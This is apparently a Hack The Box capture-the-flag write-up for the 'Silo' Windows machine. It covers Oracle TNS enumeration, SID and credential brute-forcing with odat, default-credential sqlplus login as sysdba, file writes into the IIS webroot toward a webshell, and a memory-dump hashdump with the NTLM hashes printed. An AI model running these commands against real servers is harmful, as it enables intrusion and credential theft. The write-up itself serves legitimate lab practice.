HACKTHEBOX MACHINES

HTB [Silo]


#windows#oracle#RoguePotato#forensics#hashdump

RECON

Port scan 

PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   syn-ack Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49159/tcp open  oracle-tns   syn-ack Oracle TNS listener (requires service name)
49160/tcp open  msrpc        syn-ack Microsoft Windows RPC
49161/tcp open  msrpc        syn-ack Microsoft Windows RPC
49162/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 33342/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 52707/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38458/udp): CLEAN (Timeout)
|   Check 4 (port 10413/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
|_clock-skew: mean: -5h29m57s, deviation: 0s, median: -5h29m58s
| smb2-time:
|   date: 2023-01-25T13:12:32
|_  start_date: 2023-01-25T12:38:06
  • 80 Runs Default IIS server , port 1521 seems Interesting, it’s Oracle TNS Listener

SMB Enumeration

  • enum4linux , smbmap , rpcclient not worked, because of the authentication error

INITIAL FOOTHOLD

ORACLE

  • A quick googling revealed there are bunch of ways to enumerate this, I’ll go with this boohacktricks method
  • Brute-force the SID with odat tool

  • Found a valid SID -> XE
  • Next let’s use the password guesser to find the username and password

  • We’re using small letter file, coz the default one has bunch of CAPITAL LETTERS and that doesn’t work :)
  • With the creds, I’m going to login with sqlplus
sqlplus scott/tiger@10.10.10.82/XE

  • For more privs let’s use as sysdba in our sqlplus command to enter as system database administrator (like sudo)
sqlplus scott/tiger@10.10.10.82/XE as sysdba

  • Now we have more privilleges
  • Looks like we can read/write files using this
  • If you check the help command of the odat tool, you can see utlfile to download/upload/delete files
  • So, let’s try to download the home page of the webserver
  • If it works we can upload a aspx file there to get a rev shell, ezpz

READ/WRITE with odat

  • The default root of the IIS server is located at C:\inetpub\wwwroot, let’s try to read the iisstart.htm file there

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --getFile "C:\inetpub\wwwroot" "iisstart.htm" "/home/kali/htb/boxes/silo/www/iisstart.htm"
  • We can able to read the files
  • Now let’s try to put a file named jo.txt with the contents we can write here ezpz

python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile "C:\inetpub\wwwroot" "jo.txt" "jo.txt"

  • We got shell!!
  • Grab the user.txt located in C:\Users\Phineas\Desktop

PRIVESC

  • Viewing this file gives a link to download a memory dump and the password for the link
  • Let’s download this and load it in volatility
  • But the password didn’t work, due to some encoding issues, So let’s upload a webshell and view the contents of the file there

  • Here we got a different password £%Hm8646uC$ , £ is not displayed properly in our terminal

  • Now let’s download this memory dump

Dumping Hashes

  • We can use the hashdump plugin to get the hashesh from the memory dump
User	        rid	lmhash	   							nthash
Administrator	500	aad3b435b51404eeaad3b435b51404ee	9e730375b7cbcebf74ae46481e07b0c7
Guest	        501	aad3b435b51404eeaad3b435b51404ee	31d6cfe0d16ae931b73c59d7e0c089c0
Phineas	       1002	aad3b435b51404eeaad3b435b51404ee	8eacdd67b77749e65d3b3d5c110b0969

  • Finally we can use evil-winrm to login as Administrator

Other ways to root

RoguePotato

  • We have SeImpersonatePrivilege so we can use RoguePotato to privesc as Admin
  • I covered that method in my remote htb writeup
Oracle

  • Since oracle is running as system privilleges we can use that odat tool to read the root.txt, ezpz

  • That’s all cya soon in my next writeup :)

Hack The Box

It would be appreciated if you give me a respect+ on HTB